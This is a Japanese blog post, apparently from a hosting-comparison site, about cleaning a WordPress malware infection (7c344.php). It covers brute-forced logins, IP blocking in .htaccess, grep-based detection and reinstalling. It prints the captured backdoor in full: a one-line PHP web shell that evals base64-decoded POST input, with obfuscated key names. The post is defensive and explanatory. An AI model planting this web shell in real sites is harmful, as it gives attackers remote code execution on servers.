ワードプレスのウィルス | レンタル サーバー 格安 比較 専用 サイト

ワードプレスのマルウェア

原理がワカッパ

 最終ログはサウジアラビアだけど、
 アタックしてきているのは、ヨーロッパ、中東、中央アジアおよびアフリカ
 94.242.237. (多分こいつだけじゃないけど)

 このIPがワードプレスのログイン情報をチェックしにきてる。
 んでから、種を埋めこんでリピートでアタックにくると。
 (アタックのIPは、うちは、31.184.244.ですた)
 よって進入経路はワードプレスのログイン。

 なので、とりあえず、公開サーバーの .htaccess は
# 拒否
order allow,deny
allow from all
deny from 31.184.244.
deny from 94.242.237.
 これを頭に埋め込む。

 その前に、自分のIPがわかるなら
# 許可
order deny,allow
deny from all
allow from 自分のIP
 にしておいてから、ユーザーのIDとパスを変える。
 変えたら、さっきのサウジアラビア、中央アジア禁止を立てる。

 でさ、やっぱね、wp-admin には、ロックをした方がいい。
 なぜなら、スパム送信用のアタックは、7c344.php にアクセスできないと
 約2~3日x24時間ぐらいでアタックをやめる。 賢い?(笑)

 WPのユーザー奪取のアタッカーも多分一定時間アクセスできなくなると
 アタックをやめるんだと思うんだ。

 どんなに乱数でパスワードを作っても、相手も乱数で構成するから
 当たりがでる確率が高い。

 だから、そんな場所は存在しませんよ~~。みたいな。
 そんな感じにしておけばいいわけだ。

 なので、wp-admin の .htaccess は、自分のIPだけ許可するか、
 ディレクトリにロックをかけるのが安全。

 ユーザー、パスワードをかえただけではいずれ破られます。
 相手はプログラムだから、ハムスター並にそこに届きそうな場所があれば、
 壁を越えるまで続けます。

さらに詳しい情報と対策ツールの無慮配布は、ゆずまるのオフィシャルサイトで公開してあります。
ゆずまるのオフィシャルサイト、ワードプレスマルウェアの対策

7c344.php ワードプレスのウィルス 追加情報

7c344.php を入手しました。

 コードの内容は、こんな感じ
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}
?>
 これがメールを送信してるわけ。

 本文は、どこからか送りつけるらしい。
 そすっとこいつが回り続ける。

 この 7c344.php を設置したときにウィルスの本部?に
 どこに設置したかを連絡して、その本部が送信を開始するってこと。
 その本部の多くはサウジアラビアだという。
 ※経由なのかわからないけど、
 足場にされているのはサウジアラビアでまちがいないらしい。

 でだ、この 7c344.php は、固定のファイル名ではなく、
 7c32.php とかいうのもあるみたい。
 そうなるとこの 7cXXXX.php ってファイル名もあやしい(笑)

 したがって、ファイル名だけで駆除するのは難しくなる。
 wp-7c33.php とかってあったら、削除する時びびるべ?(笑)

 一番安全なのは、根こそぎ殺すこと。つまりディレクトリごと殺す。
 データベースは生きてる・・・る?みたいなので
 新たにディレクトリを作って、そこにWPをインストールして復活させる。

 プログラムで駆除するならば、$_POST って文字列で探しても
 いいみたい。
 メール送信のプラグインで使っていなければの話だけどね?
 contact-form-7 では $_POST は使っていなかった。

 埋め込みも考えられなくもないので、ファイルごともだし、
 上記のコードを構文解析して駆除するのもありだと思う。

 まぁ、手間はかかるけどディレクトリを総なめして $_POST を
 探すプログラム書いて、コードそのものは手でなおすってのが
 速そうだけどね?(笑)

 どちらにしても WP で $_POST は使っていないし、
 eval(base64_decode ってコードはつかっていない。
 
 これを手がかりにして追跡するといい。

 「参考までにver3.3のソースをみると
  eval は、wp-admin/press-this.phpで2箇所、
  同revisions-js.phpで1箇所。あとはコメント。
  base64_decode も wp-app.php で2箇所、
  wp-includes/class-IXR.php で1箇所、
  同class-simplepie.php で1箇所のみ。」

 プログラムを書けない人は、 grep ってコマンドを検索してみよう。

 grep ってのは、複数のディレクトリ、ファイルの中から、
 指定した文字列を検索してくれるツールだ。

 ローカルマシン(自分のマシン)で使うならば、
 WPをディレクトリごとダウンロードして
 そのディレクトリを grep をつかって上記の文字列を検索すればいい。

 なぜか、今回のウィルスの具体的なことが、
 日本語サイトで見つけれなかったので書いてみた。

 参考になれば幸いです。

 やはりゆずまるカバーは便利だということも忘れずに参考にしてください。
 ⇒ゆずまるカバーG

 こっちでかいたやつの駆除もわすれずに
 ⇒7c344.php ワードプレスのウィルス

7c344.php ワードプレスのウィルス

7c344.php ワードプレスのウィルス

 便利なワードプレス、使ってます?

 MTよりも更新が軽くてカスタマイズがとってもしやすい。
 テーマも豊富だし、アフィリエイトに限らず、
 最近は一般サイトもワードプレスで作ってますね?

 ところが、ここんところ、ワードプレスのウィルスが蔓延しています。

 ウィルスにやられたという方も多いかと思いますが、
 同時に、気がついていない方も多い!

 このウィルスはワードプレスのテーマから進入して、
 そこから増殖していきます。
 増殖先は、既知のワードプレスのPHPファイル。

 さらに有名プラグインのファイルに感染していきます。
 つまり、ウィルス側でファイル名がわかっているファイルに
 感染していきます。

 感染するとどうなるか?

 あなたのサイトを検索エンジンで検索して、
 クリックするとスパムサイトへ飛ばされる。
 アクセス激減、スパムサイトと認証をうけてしまう。
 そして、ドメインごとお釈迦。

 検索からのクリックじゃないと現象がでないから、
 本人はすごく気が付きにくい。

 知らないでいると、さらに 7C344.php というファイルを
 あちらこちらの既知のフォルダーに生成しはじめます。
 このファイルは、大量にスパムメールを配信し始めます。

 放置しておくとドメインがスパムドメインと認知され、
 さらには、ドメインだけじゃなくサーバー全体がスパム認定されちゃいます。

 じゃあ、どうするか?
 ワードプレスのフォルダーを見て、
 更新日が違ってるファイルがないか調べます。
 php に巣食うので、.css なんかの日付と比較するとわかりやすい。

 異なる日付のファイルをひとつ開いてみよう。
 このとき FFFTP とか FileZilla だと、
 ファイルをダウンロードするのでめんどくさい。

 基本的にFTPソフトは、NextFTPを使うようにしましょう。
 ⇒NextFTP

 ファイルを開いてみて、eval(base64_decode( ~~~ ));
 のような記述がないかみてみよう。
 ( ~~~は、わけわかめの英数文字 )
 この eval(base64_decode( ~~~ )); がウィルスの本体です。

 ワードプレスのPHPには、
 eval(base64_decode( ~~~ ) のような記述のファイルはない。
 唯一 wp-config.php の中に英数のわけわかめの値を
 代入している文章があるけど、これは、代入文になっている。
 (代入文 XXXX=YYYYYY; のような形)

 で、この eval(base64_decode( ~~~ )); を削除しましょう。
 ※1箇所じゃなくあちらこちらに入ってる。

  新しいバージョンにしましょうっていうけど、
  これは実は新しいバージョンならウィルスが入らないということではない。
  新しいバージョンにするとWPのファイルが上書きされて、
  ウィルスの入ってるワードプレスのファイルがなくなるという対策。

 どんなにワードプレスをバージョンアップしても、
 7c344.php ってスパムメールを送信するプログラムが残ってしまう。
 このファイルは、見つけて削除するしかない。

 7c344.php は、固定の名前なのか、
 ゆずまるの手元にそのファイルがないので不明なんだけど、
 サイトで検索したら英文のものが有限個しかみつからなかったから、
 固定じゃないのかもしれない。

 7c344.phpのファイルが今日明日中に手に入る予定なので、
 その辺りは調べてみる。

 これの除去は、覚えのないファイルをチェックするしかないけど、
 どれが覚えがないかなんてわからないよね?(笑)
 サーバーの簡単インストールを使った人はなおさらだ。

 さらにね、そのファイルの所有者がアパッチになってる。
 つまり、サーバーによっては、
 あなたはそのファイルを修正したりできなかったりするわけだ。

 所有者の移動を許してるサーバーって少ないんだけど、
 レオサーバーはコンパネから所有者を変更できる。
 ⇒レオサーバー

 知識のない人はあきらめるしかない。
 あきらめるしかないんだから、やってみることですね。
 やったことがなければいつまでも知識にならないから。
 こわして当たり前ってことで。

 テーマとアップした画像のフォルダー、
 およびwp-config.php だけバックアップして、それらのウィルスを除去。
 (7c344.php 系には注意、ファイル名が違っているかもしれないので)

 で、現状のワードプレスのフォルダーを削除して、
 新しくワードプレスを入れます。

 wp-admin でログインをコールするとデータベースの
 復旧を聞いてくるので普及させればおしまい。

 その後は、テーマのカスタマイズが終わったら
 書き込み禁止にしておくこと。

 で、さらに、admin などのユーザー名を使っているのなら、
 早々別の管理者ユーザーを追加して、admin って管理者は削除しよう。

 ゆずまるは、ディレクトリーを
 総なめして駆除するツールを書いたので ・・・
 サポートなしで980円で売る!(笑)

 なんてね?(笑)
 そこはまだ未定(笑)

 ワードプレスに限らず全ての CMS に可能性がある。
 なぜならCMSの多くのカスタマイズは、
 直接 php をいじらせるものが多いからだ。

 重い腰をあげてチェックしておこう。
 気が付きにくいからウィルスなんだ。
 柔軟性の裏には危険が潜んでいることも忘れずに。

 そして、アクセス解析は、ゆずまるカバーGが便利だということも忘れずに。
  ↓ ↓ ↓
 ゆずまるカバーG

 ・・・どーゆー脈絡だ!>自分

追加情報⇒7c344.php ワードプレスのウィルス 追加情報

レンタル サーバー 格安 比較 専用 サイト TOP » ワードプレスのウィルス